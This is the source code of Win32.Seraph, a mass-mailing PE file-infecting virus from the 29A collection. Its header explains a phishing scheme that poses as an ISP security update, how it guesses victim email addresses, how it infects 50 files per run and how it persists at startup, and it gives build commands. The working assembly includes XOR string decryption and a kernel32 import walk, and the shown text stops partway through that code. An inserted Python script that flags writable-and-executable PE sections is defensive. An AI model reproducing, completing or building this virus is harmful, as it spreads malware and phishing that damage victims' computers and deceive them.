29a-7.013

Virus source code collected from 29A
;
; [ Win32.Seraph@mm     Vorgon/iKX ]       
; [ 28672 bytes        Target - PE ]        
; [ 09/28/03        Made in Canada ]
; 
;
;
;
; [ Introduction ]
;
; Seraph is a mass-mailing virus that takes advantage of social engineering. This may sound
; boring to you, but it takes social engineering to the next level. Seraph is an information
; gatherer. It takes data from websites, computers, URLs and uses what it finds to generate 
; a convincing and personal email message. 
; 
; So what information does Seraph gather? Seraph gathers information about the Internet service
; provider of the computers it infects. Information such as:    
;   
;   ISP Name          example: AOL
;   Domain            example: AOL.COM
;   Website           example: WWW.AOL.COM
;   Logo              example: HTTP://www.aol.com/logo.gif
;   Deadline          example: SEPTEMBER 21, 2003
;   Copyright String  example: (C) 2003 AOL INC.
;
; What does Seraph do with this information? Seraph takes everything you see above and generates 
; an email message in HTML format. The message containing a logo image, names, valid email 
; addresses, etc, appears to be a security update from your ISP. Unsuspecting victims reading this
; email message see that they must install the attached update by the deadline date, or face 
; disconnection of their Internet service.   
;
; How does Seraph know the email addresses of other people on the same ISP? Seraph takes a list
; of the 1024 most popular surnames in the USA and randomly selects one. It then appends a first
; initial to either the start or the end of the surname. This gives a possible 53238 email addresses
; per ISP.  
;
; Sure this will spread to users on the same ISP, but how does it spread to other ISPs? Seraph 
; is highly infectious. Every time it runs it infects 50 files on all drives it can find on a
; computer, except CD-ROM and drive A. It will naturally find executables in file sharing
; directories, shared folders, and anything else you can imagine.
;
;
; [ Other ]
;
; I named this virus after Seraph from the Matrix Reloaded. Seraph (the Chinese guy Neo meets 
; before meeting the Oracle) had golden code and was so spectacular because he came from the first 
; incarnation of the matrix, which was heaven. "Seraph" is singular for the plural "seraphim". The 
; seraphim are the highest choir of angels and included amongst others: Lucifer, Gabriele, Raziel 
; and Malaciah, and they sit on the 8th level of Heaven just one below God.  
;
;
; [ Bug Fixes ]
;
; Below is a list of bugs I have fixed in this version.
;
; -The find file code begins searching at the start of the first drive instead of the current
;  directory. This bug was causing the entire contents of the most important drive to be excluded 
;  from the search.
;
; -Files in the system directory are no longer infected. Infecting files in this directory was
;  causing Windows to not boot at all.
;
; -The program to be run on start-up is no longer whatever infected program is executed. It has
;  been changed to the program that was last infected. Before if the user deleted the infected
;  email attachment after executing the virus it would not be able to run on start-up. 
;
;  
; [ The Infection ]
;
; Below is a breakdown of what the virus does, in order:
;
; - Decrypt the virus
; - Get the address of GetModuleHandleA
; - Get the kernel32.dll address
; - Get the address of GetProcAddress
; - Load the win9x API functions
; - Create a thread to execute the rest of the virus code
; - Infect 50 files on drives B-Z, excluding CD-ROM 
; - Make the last file infected run on start-up
; - Display an install message if the filename is patch110.exe
; - On February 23 display the payload
; - Load the win2k API functions if the OS version permits
; - Get the IP address of the computer
; - Get the hostname of the computer
; - Extract the ISP domain from the host name of the computer
; - Download the main page of the internet service provider and handle redirections
; - Search the webpage for a logo image URL
; - Get the company name of the ISP
; - Create a deadline date for the email message
; - Generate an email address
; - Create the email message using all the data collected
; - Send the email message
; - Send the current host EXE as the update attachment.
; - Exit the thread
;
;
; [ Assembling ]
;
;  tasm32 /ml /jLOCALS seraph
;  tlink32 -aa -x /Tpe /c seraph,seraph,,import32.lib,, 
;  editbin /SECTION:CODE,rwe seraph.exe
;
;
; [ Greetz ]
; 
; T00fic, Morphine, Eddow, Raid, Gigabyte, Kefi, SPTH, Kernel32
;
;
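As an added, defender-side example that is not part of the original source: the assembling step above marks the CODE section read/write/execute with editbin, and the SECTION_RWE constant (0E0000020h) declared further down carries the same flags. This Python parser walks a PE section table and reports every section that is both writable and executable, a cheap triage heuristic for files touched by this kind of infector. The sample PE image is constructed inline and is not a real binary.

```python
import struct

# Section characteristic bits from the PE specification
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE   = 0x80000000
SECTION_RWE = 0xE0000020   # the value the virus source uses (read|write|execute|code)


def rwe_sections(data: bytes) -> list:
    """Return the names of sections flagged both writable and executable.

    Raises ValueError if the buffer is not a PE image at all.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # DOS_HEADER.lpPEHeader
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size                             # first SECTION_HEADER
    found = []
    for i in range(num_sections):
        off = table + i * 40                                     # SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]      # dwCharacteristics
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            found.append(name)
    return found


def build_sample(code_chars: int) -> bytes:
    """Constructed minimal PE image with a CODE and a .data section (sample input only)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # PE header right after DOS header
    opt = bytes(224)                                             # PE32 optional header, contents unused here
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)

    def section(name: bytes, chars: int) -> bytes:
        return name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, chars)

    return (bytes(dos) + b"PE\0\0" + coff + opt
            + section(b"CODE", code_chars)
            + section(b".data", 0xC0000040))                     # read|write|initialized data


if __name__ == "__main__":
    print(rwe_sections(build_sample(SECTION_RWE)))               # ['CODE']
```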

.486p
.MODEL flat, stdcall
   EXTRN   GetModuleHandleA     : PROC

;-------------------------------------------------------------------------------------------------;
; Constants                                                                                       ;
;-------------------------------------------------------------------------------------------------;

    ; file I/O constants
    OPEN_EXISTING             EQU 3
    GENERIC_READ              EQU 80000000h   
    GENERIC_WRITE             EQU 40000000h
    FILE_SHARE_READ           EQU 1
    FILE_SHARE_WRITE          EQU 2
    FILE_BEGIN                EQU 0
    FILE_END                  EQU 2

    ; DNS constants
    DNS_QUERY_STANDARD        EQU 0
    DNS_TYPE_PTR              EQU 12
    DNS_TYPE_MX               EQU 15
    DNSREC_ANSWER             EQU 1
    DNS_FREE_RECORD_LIST_DEEP EQU 1

    ; winsock constants
    AF_INET                   EQU 2
    SOCK_STREAM               EQU 1
    PCL_NONE                  EQU 0
    SO_RCVTIMEO               EQU 1006h
    SO_SNDTIMEO               EQU 1005h
    SOL_SOCKET                EQU 0FFFFh    

    ; registry constants
    HKEY_LOCAL_MACHINE        EQU 80000002h
    REG_SZ                    EQU 1

    ; MISC constants
    GMEM_FIXED                EQU 0
    SECTION_RWE               EQU 0E0000020h
    TRUE                      EQU 1
    FALSE                     EQU 0
    EXIT_THREAD               EQU 1
    CRLF                      EQU 13, 10
    DRIVE_CDROM               EQU 5

;-------------------------------------------------------------------------------------------------;
; Structures                                                                                      ;
;-------------------------------------------------------------------------------------------------;

    PE_HEADER                               STRUC 
        dwSignature                         DD 0 
        wMachine                            DW 0
        wNumberOfSections                   DW 0
        dwTimeDateStamp                     DD 0
        dwPointerToSymbolTable              DD 0
        dwNumberOfSymbols                   DD 0
        wSizeOfOptionalHeader               DW 0
        wCharacteristics                    DW 0
        wMagic                              DW 0
        cMajorLinkerVersion                 DB 0
        cMinorLinkerVersion                 DB 0
        dwSizeOfCode                        DD 0
        dwSizeOfInitializedData             DD 0
        dwSizeOfUninitializedData           DD 0
        dwAddressOfEntryPoint               DD 0
        dwBaseOfCode                        DD 0
        dwBaseOfData                        DD 0
        dwImageBase                         DD 0
        dwSectionAlignment                  DD 0
        dwFileAlignment                     DD 0
        wMajorOperatingSystemVersion        DW 0
        wMinorOperatingSystemVersion        DW 0
        wMajorImageVersion                  DW 0
        wMinorImageVersion                  DW 0
        wMajorSubsystemVersion              DW 0
        wMinorSubsystemVersion              DW 0
        dwReserved1                         DD 0
        dwSizeOfImage                       DD 0
        dwSizeOfHeaders                     DD 0
        dwCheckSum                          DD 0
        wSubsystem                          DW 0
        wDllCharacteristics                 DW 0
        dwSizeOfStackReserve                DD 0
        dwSizeOfStackCommit                 DD 0
        dwSizeOfHeapReserve                 DD 0
        dwSizeOfHeapCommit                  DD 0
        dwLoaderFlags                       DD 0
        dwNumberOfRvaAndSizes               DD 0
        dwExportDirectoryVA                 DD 0
        dwExportDirectorySize               DD 0
        dwImportDirectoryVA                 DD 0
        dwImportDirectorySize               DD 0 
        dwResourceDirectoryVA               DD 0
        dwResourceDirectorySize             DD 0
        dwExceptionDirectoryVA              DD 0
        dwExceptionDirectorySize            DD 0
        dwSecurityDirectoryVA               DD 0
        dwSecurityDirectorySize             DD 0 
        dwBaseRelocationTableVA             DD 0
        dwBaseRelocationTableSize           DD 0
        dwDebugDirectoryVA                  DD 0
        dwDebugDirectorySize                DD 0
        dwArchitectureSpecificDataVA        DD 0
        dwArchitectureSpecificDataSize      DD 0
        dwRVAofGPVA                         DD 0
        dwRVAofGPSize                       DD 0
        dwTLSDirectoryVA                    DD 0
        dwTLSDirectorySize                  DD 0
        dwLoadConfigurationDirectoryVA      DD 0
        dwLoadConfigurationDirectorySize    DD 0
        dwBoundImportDirectoryinheadersVA   DD 0
        dwBoundImportDirectoryinheadersSize DD 0
        dwImportAddressTableVA              DD 0
        dwImportAddressTableSize            DD 0
        dwDelayLoadImportDescriptorsVA      DD 0
        dwDelayLoadImportDescriptorsSize    DD 0
        dwCOMRuntimedescriptorVA            DD 0
        dwCOMRuntimedescriptorSize          DD 0
        dwNULL1                             DD 0
        dwNULL2                             DD 0
    PE_HEADER                               ENDS
 
    SECTION_HEADER             STRUC
        sAnsiName              DB 8 DUP(0) 
        dwVirtualSize          DD 0 
        dwVirtualAddress       DD 0  
        dwSizeOfRawData        DD 0 
        dwPointerToRawData     DD 0
        dwPointerToRelocations DD 0
        dwPointerToLinenumbers DD 0
        wNumberOfRelocations   DW 0
        wNumberOfLinenumbers   DW 0
        dwCharacteristics      DD 0
    SECTION_HEADER             ENDS

    DOS_HEADER                 STRUC
        wSignature             DW 0
        wBytesInLastBlock      DW 0
        wBlocksInFile          DW 0
        wNumberOfRelocs        DW 0
        wHeaderParagraphs      DW 0
        wMinExtraParagraphs    DW 0
        wMaxExtraParagraphs    DW 0
        wSS                    DW 0
        wSP                    DW 0
        wChecksum              DW 0
        wIP                    DW 0
        wCS                    DW 0
        wRelocTableOffset      DW 0
        wOverlayNumber         DW 0
        sUnused                DB 32 DUP(0)
        lpPEHeader             DD 0
    DOS_HEADER                 ENDS

    WSA_DATA                   STRUC
        wVersion               DW 0
        wHighVersion           DW 0
        szDescription          DB 257 dup(0)
        szSystemStatus         DB 129 dup(0)
        iMaxSockets            DW 0
        iMaxUdpDg              DW 0
        lpVendorInfo           DD 0
    WSA_DATA                   ENDS

    SOCK_ADDRESS               STRUC
        sin_family             DW 0
        sin_port               DW 0
        sin_addr               DD 0
        sin_zero               DB 8 dup(0)
    SOCK_ADDRESS               ENDS

    DNS_RECORD                 STRUC
        pNext                  DD 0
        pName                  DD 0
        wType                  DW 0
        wDataLength            DW 0
        flags                  DD 0
        dwTtl                  DD 0
        dwReserved             DD 0
    DNS_RECORD                 ENDS

    SYSTEM_TIME                STRUC
        wYear                  DW 0
        wMonth                 DW 0
        wDayOfWeek             DW 0
        wDay                   DW 0
        wHour                  DW 0
        wMinute                DW 0
        wSecond                DW 0
        wMiliseconds           DW 0
    SYSTEM_TIME                ENDS

    WIN32_FIND_DATA            STRUC    
        FileAttributes         DD 0
        CreateTime             DQ 0
        LastAccessTime         DQ 0
        LastWriteTime          DQ 0
        FileSizeHigh           DD 0
        FileSizeLow            DD 0
        Reserved0              DD 0
        Reserved1              DD 0
        FullFileName           DB 260 dup(0)
        AlternateFileName      DB 14 dup(0)
    WIN32_FIND_DATA            ENDS

;-------------------------------------------------------------------------------------------------;
; Macros                                                                                          ;
;-------------------------------------------------------------------------------------------------;

    ImportTable         MACRO   tableName
                        &tableName:
                        ENDM

    EndImport           MACRO
                        DB 0
                        ENDM

    EndImportTable      MACRO
                        DB '$'
                        ENDM    

    ImportDll           MACRO   dllName
                        sz&dllName DB '&dllName', '.dll', 0
                        ENDM

    ImportFunction      MACRO   functionName
                        sz&functionName DB '&functionName', 0
                        &functionName   DD 0
                        ENDM

    ApiCall             MACRO   functionName
                        call    [ebp+&functionName]
                        ENDM

    pushptr             MACRO   variable
                        lea     eax, [ebp+&variable]
                        push    eax     
                        ENDM

    pushval             MACRO   variable
                        push    [ebp+&variable]
                        ENDM

.DATA  

    DD 0  ; workaround for a TASM quirk (keeps the data section non-empty)

;-------------------------------------------------------------------------------------------------;
; Code Section                                                                                    ;
;-------------------------------------------------------------------------------------------------;

.CODE      
main: 

;-------------------------------------------------------------------------------------------------;
; Load the virus and its resources.                                                               ;
;-------------------------------------------------------------------------------------------------;

    ; get the delta pointer
    call    getDeltaPointer                        ; where am i?!?!
getDeltaPointer:
    pop     edi
    mov     ebp, edi
    sub     ebp, offset getDeltaPointer
    
    ; very basic XOR decryption to hide strings
    cmp     ebp, 0
    je      encrypted
    lea     esi, [ebp+encrypted]
    mov     ecx, CODE_SIZE - (offset encrypted - offset main)
decrypt:
    xor     byte ptr [esi], 123
    inc     esi
    loop    decrypt
   
    ; all code from this point on will be encrypted      
encrypted:

    ; get the image base
    sub     edi, 5
    mov     [ebp+lpStartOfCode], edi               ; save the start of code
    and     edi, 0FFFFF000h                        ; round off the VA to the nearest page
findImageBase:
    cmp     word ptr [edi], 'ZM'                   ; start of image?
    je      findKernel
    sub     edi, 1000h
    jmp     findImageBase

    ; find the address of the kernel32
findKernel:
    mov     [ebp+lpImageBase], edi

    mov     eax, edi
    mov     ebx, [eax+3ch]                         ; ebx = pointer to the PE header
    mov     esi, [ebx+eax+128] 
    add     esi, eax                               ; esi = pointer to the import section
    xor     ecx, ecx    
findKernel32:
    mov     ebx, [esi+ecx+12]                      ; get an RVA to the dll name
    cmp     ebx, 0                                 ; no more dll's left?
    je      returnHostControl                
    add     ebx, eax
    cmp     dword ptr [ebx], 'NREK'                ; Kernel32.dll found?
    je      findGetModuleHandleA
    add     ecx, 20                                ; next import
    jmp     findKernel32    
findGetModuleHandleA:    
    mov     edx, [esi+ecx]
    sub     edx, 4    
    lea     esi, [esi+ecx]
    xor     ecx, ecx
findName:
    inc     ecx
    add     edx, 4               
    mov     ebx, [edx+eax]                         ; next name
    cmp     ebx, 0                                 ; no more function names left?
    je      returnHostControl
    lea     ebx, [ebx+eax+2]
    cmp     dword ptr [ebx], 'MteG'
    jne     findName
    cmp     dword ptr [ebx+4], 'ludo'
    jne     findName
    cmp     dword ptr [ebx+8], 'naHe'
    jne     findName
    cmp     dword ptr [ebx+12], 'Aeld'             ; GetModuleHandleA?
    jne     findName

    ; get the address of the GetModuleHandleA function
